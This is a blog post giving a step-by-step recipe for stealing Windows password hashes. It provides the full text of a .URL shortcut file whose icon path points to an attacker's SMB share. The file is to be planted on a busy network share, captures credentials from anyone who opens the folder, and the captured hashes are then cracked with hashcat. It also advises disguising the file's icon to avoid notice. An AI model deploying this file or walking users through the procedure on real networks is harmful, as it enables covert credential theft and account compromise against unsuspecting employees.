A better way to capture hashes with no user interaction by @_markmo_

Mark Mo
Mark Mo
Sep 24, 2018 · 3 min read

I found a better way to capture hashes from a post by @insertscript on twitter

This uses a .URL file with that accesses environment variables and causes the user to connect to the attackers file share without any user interaction. Here is the quote from @insertscript “As soon as explorer.exe views a folder, which contains a .URL file, it will lookup any specified environment variable like %PATH%or %USERNAME% before sending the actual request, therefore leaking its content to the attacker controlled server.” (https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html)

Right, first we setup an SMBListener on our attacking machine (probably on an internal network as most companies block outbound SMB).

Next we create a text file on a file share, hopefully somewhere with a lot of traffic like shared document. (once you create the file you can drop it on any share).

Paste this into the text file:
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\PutYourSmbListenerShareHere\%USERNAME%.icon
IconIndex=1

You only need to replace the IconFile PATH with the share you setup in the first step with SMBServer, Responder or Inveigh.
***PLEASE NOTE*** to leave the %USERNAME%.icon exactly where it is. This is what initiates the connection

Here is what it should look like when you are done

Now, make sure you have view file extensions and hidden files on.

Rename you file with a .URL extension and the magic will begin.

It should look like this when you are done

You should ALREADY have a connection in your smb listener!

Now anyone that visits that share will attempt to automatically authenticate to your SMB listener. If you want to be extra sneaky change the icon of your .URL file. Also, see the notes at the end.

Now to crack with hashcat. Copy the hash

Paste it into a file (i’m just echoing it to a file)

Run hashcat and hopefully the password is in your password list

Hooray Cracked It!

Huge thanks to @insertscript for sharing that info.

Feel free to follow me on twitter @_markmo_

I try to share what I learn as so many have done for me.

FINAL NOTE. While testing I found some weird behavior when I tried to use the same filename more than once that prevented things from working correctly. To make your life easy just create unique filename every time (1.url, 2.url, etc).

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade